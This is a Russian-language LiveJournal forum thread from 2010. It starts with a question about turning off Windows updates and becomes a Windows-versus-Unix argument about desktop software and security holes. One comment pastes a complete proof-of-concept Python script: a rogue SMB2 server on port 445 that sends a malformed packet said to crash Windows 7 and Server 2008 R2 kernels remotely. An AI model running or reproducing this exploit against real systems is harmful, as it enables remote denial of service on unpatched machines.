[identity profile] navarskaj.livejournal.com posting in [community profile] useful_faq
Хочу отменить закачку бесконечных обновлений для виндоуса (лицензионный). Чего будет?
Где снять галочку? Как это сделать?
Спасибо.

Date: 2010-01-17 01:16 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
snmp фаерволим и никаких виннюк :P

Date: 2010-01-17 01:21 am (UTC)
From: [identity profile] a1q1.livejournal.com
так а если нужда в использовании. что ж теперь отказываться и не юзать?

Date: 2010-01-17 01:29 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
чивойта за нужда 95ю венду в интернет голой попой выставлять? :O

Date: 2010-01-17 01:30 am (UTC)
From: [identity profile] a1q1.livejournal.com
я про виннюку в вин7 и в2к8

Date: 2010-01-17 01:36 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
ааа так то самбовская! самбу ваще незя выставлять) вы и на фре ее не откроете

Date: 2010-01-17 01:43 am (UTC)
From: [identity profile] a1q1.livejournal.com
ну оно и не открыто:) но сам факт дырки то... тема то о дырках развивалась, и этот shurikh защитник хомячков просил указать ему хоть на одну дырку. но чо та слился быстро. эксплойтов то на примете есть несколько в загашничке на указать хомячку его места, ну чтоб знал кто его барен бгг.

Date: 2010-01-17 01:46 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
а!
я больше радуюсь с дырявого адобе - это ж надо СТОЛЬКО ужасных дырок выпускать год за годов в своих акробат ридерах и флешах

Date: 2010-01-17 01:54 am (UTC)
From: [identity profile] a1q1.livejournal.com
самое забавное наблюдать как хомячки пищат в предвкушении выхода новой вин*, но по выходу жутко плюются и обсирают, юзают и обсирают, юзают и обсирают.
хотя я вот не понимаю что в вин* такого нужного и оригинального, что нельзя заменить ( кроме игр, тут да, винду нужно держать ) а остального то софта валом. и на самый крайних случай есть wine.

Date: 2010-01-17 01:55 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
популярность

Date: 2010-01-17 01:55 am (UTC)
From: [identity profile] 3jia5l-ca6aka.livejournal.com
которaя вовсе не говорит положительно о ее качествах :D

Date: 2010-01-17 01:57 am (UTC)
From: [identity profile] a1q1.livejournal.com
ну как религии вобщем. потому всегда сравниваю винду с религиями.

(no subject)

From: [identity profile] 3jia5l-ca6aka.livejournal.com - Date: 2010-01-17 02:04 am (UTC) - Expand

(no subject)

From: [identity profile] a1q1.livejournal.com - Date: 2010-01-17 10:40 pm (UTC) - Expand

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 11:07 am (UTC) - Expand

(no subject)

From: [identity profile] a1q1.livejournal.com - Date: 2010-01-18 12:09 pm (UTC) - Expand

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 10:03 pm (UTC) - Expand

Date: 2010-01-17 07:04 am (UTC)
From: [identity profile] shurikh.livejournal.com
если такой умный, найди-ка мне удобный и быстрый аналог ACD See. Аналог а) по скорости декодирования JPEG и масштабирования б) по всеядности в) имеющий вменяемый интерфейс. Абсолютно все поделия, которые я смотрел, не выполняют минимум 2 пункта из 3-х. Да, и замену МСОфису, которая смогла бы корректно открыть хотя бы мой диплом 6-тилетней давности - ОО.о открывает его из рук вон криво, хотя там ничего особенного нет. И, да, медиаплэйер с поддержкой DXVA :) - а то мне не нравится, что воспроизведение видео 1080р жрет столько проца, а видяха простаивает. Ну или нормальный софтовый декодер, не унылый ffmpeg. Потому как тот же CoreAVC в полностью софтовом режиме не грузит проц на тех же файлах более чем на 30%. Чё ж мне ещё-то не хватает для счастья в лине... ах да, нормального рендерера шрифтов - МСовский ClearType кроет кривую интерполяцию как ну вы поняли кто. Не говоря уже о качестве шрифтов в системах - все наборы из FreeType, Libertine, DjVu и прочие поделия ну никак не дотягивают до нормальных Times, Arail, Tahoma, Verdana, Courier New.

отвеччаю вам последний...

Date: 2010-01-17 11:07 pm (UTC)
From: [identity profile] a1q1.livejournal.com
... раз, бо не интересно мне доказывать дураку, что он просто ленив и глуп.
--аналог ACD See
gThumb2
gQview
ну и монстр типа совсем как ваш любимец Endeavour Mark II с кучей плюгинов и т.д.
---Да, и замену МСОфису
старофис
---И, да, медиаплэйер с поддержкой DXVA
да лю,ой плеер впринципе, хоть тот же mplayer который в основном из каропки.
VDPAU есть давно, раньше чем в венде это плееры заумели гдето на годик,
http://en.wikipedia.org/wiki/VDPAU
в бональном мплеере окрываеца примерно так mplayer-vdpau или через гуй автоматом.
ну любителям мс шрифтов можно юзать мс шрифты:) такая простая идея в голову не приходила? я например так и делаю.

Date: 2010-01-17 07:17 am (UTC)
From: [identity profile] shurikh.livejournal.com
что нельзя заменить у меня - нет нормально программы трассировки плат, понимающей стандартные форматы файла и нормально работающий, нет софта для для работы с прошивками телефонов. хотя бы на МТ626. Ну вот нету такого софта.

Date: 2010-01-17 01:32 am (UTC)
From: [identity profile] a1q1.livejournal.com
I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

def handle(self):

print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()

Date: 2010-01-17 06:55 am (UTC)
From: [identity profile] shurikh.livejournal.com
я не говорил про серверные применения. как десктоп - винда незаменима. это раз. а два - в никсах и бсд на поверку дыр не меньше.

Date: 2010-01-17 10:55 pm (UTC)
From: [identity profile] a1q1.livejournal.com
меньше гораздо, даже больше скажу, их нет.
можите проверить и предоставить пруфлинк. например в опенбсд и солярис10:) только не в стороннем совте а именно в системе. ( линуксы не берём так как это дистрибутив сборная солянка )
могу показать где искать , например тут http://www.securityfocus.com
а про не заменимость как десктоп ну кому как, вот папа у меня в игры не играет давно, и пользует с удовольствием какойто там из линуксов. кроме популярных иигр там всё есть:)

Date: 2010-01-18 11:02 am (UTC)
From: [identity profile] shurikh.livejournal.com
что такое "сама система"? голое ядро с tcp/ip стеком, или вообще голое ядро? а что такое ядро, когда в него встроены как минимум дрова? и кому оно нужно без всего остального? и я уже перечислял специфичный софт, которого ПРОСТО НЕТ на *nix-ах. Добавлю до кучи Nikon Caprure NX, который нужен для нормальной проявки .NEF файлов. Нормальной, качественной, а не той, которая не видит половину метаданных (я про dcraw и его front-end'ы в курсе, спасибо, кушайте сами).

Date: 2010-01-18 12:05 pm (UTC)
From: [identity profile] a1q1.livejournal.com
что такое "сама система" - базовая система.
спец софта вот нет для меня на винде. например вот для робота который у нас в конторе чистит днища кораблей. дрова есть под никсы:) оставте свою предвзятость. бо я вам тоже могу список софта выкатить, который вы ненайдёте под вынь. ваш разговор на уровне 16тилетнего ребёнка.

Date: 2010-01-18 12:34 pm (UTC)
From: [identity profile] shurikh.livejournal.com
>бо я вам тоже могу список софта выкатить
выкатите. я говорю про настольный софт.

>вы лучше по существу ответте, что делать с виннюкой
я не спец по администрированию серверов, речь шла про настольные системы. мне лично наплевать, есть у моего рабочего компа на Windows 7 эта уязвимость или нет. о черверах речь не шла изначально, я писал про дескотпы, о чем неоднократно напоминал.

>ваш разговор на уровне 16тилетнего ребёнка
а разговор ваш, с "хомячками", "ленивыми идиотами" и прочими оборотами, на уровне взрослого мужа, да? у нас весь разговор изначально пошел по принципу "сам дурак" :)

Date: 2010-01-18 12:41 pm (UTC)
From: [identity profile] a1q1.livejournal.com
разговор начался о критических уязвимостях. вот пруф линки вё от вас жду. от меня пруфлинк на например виннюку вы получили, даже сам эксплойт рабочий. от вас пока только слова и непонятные сравнения тёплого с мягким, некому не интересные.

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 12:52 pm (UTC) - Expand

Date: 2010-01-18 12:46 pm (UTC)
From: [identity profile] a1q1.livejournal.com
а с чего вы взяли что виннюка это исключительно беда серверов? вин7 что серверная ось? а виннюкой положить 7ку на раз два:))

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 01:01 pm (UTC) - Expand

(no subject)

From: [identity profile] a1q1.livejournal.com - Date: 2010-01-18 01:30 pm (UTC) - Expand

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 02:10 pm (UTC) - Expand

(no subject)

From: [identity profile] a1q1.livejournal.com - Date: 2010-01-18 02:21 pm (UTC) - Expand

Date: 2010-01-18 12:07 pm (UTC)
From: [identity profile] a1q1.livejournal.com
вы лучше по существу ответте, что делать с виннюкой? это то с чего начался разговор. но вы начали какие то децкие отмазки, что это вовсе не важная уязвимость и чинить не нужно.

Date: 2010-01-18 09:54 pm (UTC)
From: [identity profile] shurikh.livejournal.com
порты блокировать, что еще-то.

Date: 2010-01-18 10:03 pm (UTC)
From: [identity profile] a1q1.livejournal.com
т.е. чинить уязвимость это как то не ваш путь да? проще выкинуть нафиг чем чинить да?

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 10:10 pm (UTC) - Expand

(no subject)

From: [identity profile] a1q1.livejournal.com - Date: 2010-01-18 10:13 pm (UTC) - Expand

(no subject)

From: [identity profile] shurikh.livejournal.com - Date: 2010-01-18 10:15 pm (UTC) - Expand